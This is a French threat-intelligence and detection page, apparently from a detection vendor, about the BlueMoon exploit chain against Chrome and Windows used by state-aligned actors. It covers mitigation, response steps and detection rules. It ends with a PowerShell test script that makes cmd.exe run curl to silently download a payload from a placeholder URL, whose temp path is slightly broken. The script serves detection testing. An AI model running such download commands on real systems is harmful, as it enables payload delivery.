Les vulnérabilités jour zéro de Chrome et Windows alimentent une adoption rapide par les acteurs de menace alignés sur les États
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Plusieurs acteurs de menaces axés sur l’espionnage ont adopté le kit d’exploitation BlueMoon, qui enchaîne les vulnérabilités de Chrome V8 avec une élévation de privilèges locaux (EPL) zéro-day du noyau Windows. La campagne montre une adoption opérationnelle rapide et peut impliquer le développement d’exploits assisté par IA. Plusieurs acteurs, principalement soupçonnés d’être liés à la Chine, utilisent le kit pour délivrer différentes charges utiles, y compris des extensions de navigateur malveillantes et des portes dérobées.
Enquête
Proofpoint a identifié quatre grappes de menaces distinctes utilisant le kit BlueMoon, observant des techniques d’orchestration et de chargement similaires malgré des différences dans l’emballage. L’enquête a mis en évidence l’exploitation de vulnérabilités dues à un décalage de correctif et des comportements post-exploitation tels que le chargement de DLL en contournement et l’installation d’extensions de navigateur malveillantes. L’analyse technique a également révélé une journalisation diagnostique étendue et des fichiers de transfert en markdown qui peuvent indiquer un développement assisté par IA.
Atténuation
Les utilisateurs doivent s’assurer que Chrome et les autres navigateurs basés sur Chromium sont mis à jour vers les dernières versions stables pour traiter les vulnérabilités V8. Les organisations doivent également prioriser les correctifs Windows pour réduire l’exposition à la faille EPL du noyau. La surveillance des arbres de processus suspects, y compris chrome.exe générant cmd.exe or curl.exe, et l’audit des tâches programmées pour des noms inhabituels sont recommandés.
Réponse
Si une exploitation par BlueMoon est détectée, les points d’extrémité affectés doivent être isolés immédiatement pour empêcher tout mouvement latéral supplémentaire ou exfiltration de données. Les intervenants doivent effectuer une analyse de la mémoire pour identifier les DLL chargées de façon réfléchie et inspecter les systèmes pour détecter les extensions de navigateur non autorisées. Les équipes de sécurité doivent également rechercher des mécanismes de persistance, notamment des tâches programmées suspectes et des modifications du registre dans la ruche CLSID.
Flux d’attaque
Nous mettons encore à jour cette partie.
Détections
Utilisation suspecte de CURL (via cmdline)
Fichiers suspects dans le profil d’utilisateur public (via file_event)
Possible abus de domaine de développement Cloudflare (via dns)
Tentative de communication de recherche d’adresse IP possible (via dns)
Commande et contrôle suspects par demande DNS de domaine de niveau supérieur (TLD) inhabituel (via dns)
IOCs (HashSha256) à détecter : Une fois dans un BlueMoon : des acteurs de menaces alignés sur l’État adoptent rapidement une chaîne d’exploitation nouvelle utilisant Chrome et Windows Zero-Days
IOCs (SourceIP) à détecter : Une fois dans un BlueMoon : des acteurs de menaces alignés sur l’État adoptent rapidement une chaîne d’exploitation nouvelle utilisant Chrome et Windows Zero-Days
IOCs (DestinationIP) à détecter : Une fois dans un BlueMoon : des acteurs de menaces alignés sur l’État adoptent rapidement une chaîne d’exploitation nouvelle utilisant Chrome et Windows Zero-Days
Détection de la chaîne d’exploitation BlueMoon via l’exécution de Chrome à CMD et CURL [Création de processus Windows]
Exécution de simulation
-
Narrative de l’attaque & Commandes : L’adversaire cible un utilisateur naviguant sur le web. En exploitant une vulnérabilité dans Chrome, l’attaquant force le navigateur à engendrer un shell de commande. Pour minimiser l’empreinte et éviter de télécharger de gros fichiers directement via le navigateur, l’attaquant utilise
cmd.exepour invoquercurl. La commande utilise spécifiquement les options-sS -opour télécharger silencieusement une charge utile nomméemsgbox.exedepuis un serveur distant, simulant le comportement de l’exploitation BlueMoon. -
Script de test de régression :
# Simulation de la chaîne d'exploitation BlueMoon # Étape 1 : Simuler Chrome en tant que processus parent (nous utiliserons un wrapper PowerShell pour simuler l'arbre PID/Process si nécessaire, # mais pour un test direct, nous déclenchons le modèle de ligne de commande). $SimulatedPayloadUrl = "https://raw.githubusercontent.com/example/payload/main/msgbox.exe" $TargetDir = "$env:TEMPmsgbox.exe" Write-Host "[!] Démarrage de la simulation BlueMoon..." # Pour garantir le déclenchement de la détection, nous devons imiter exactement la ligne de commande telle que définie dans la règle Sigma. # Remarque : Dans un environnement réel, chrome.exe serait le parent. # Pour ce script, nous exécutons la commande que la règle recherche. Start-Process "cmd.exe" -ArgumentList "/c curl -sS -o $TargetDir $SimulatedPayloadUrl" -Wait Write-Host "[+] Simulation terminée. Vérifiez le SIEM pour la détection." -
Commandes de nettoyage :
# Supprimer la charge utile simulée Remove-Item -Path "$env:TEMPmsgbox.exe" -ErrorAction SilentlyContinue Write-Host "[+] Nettoyage terminé."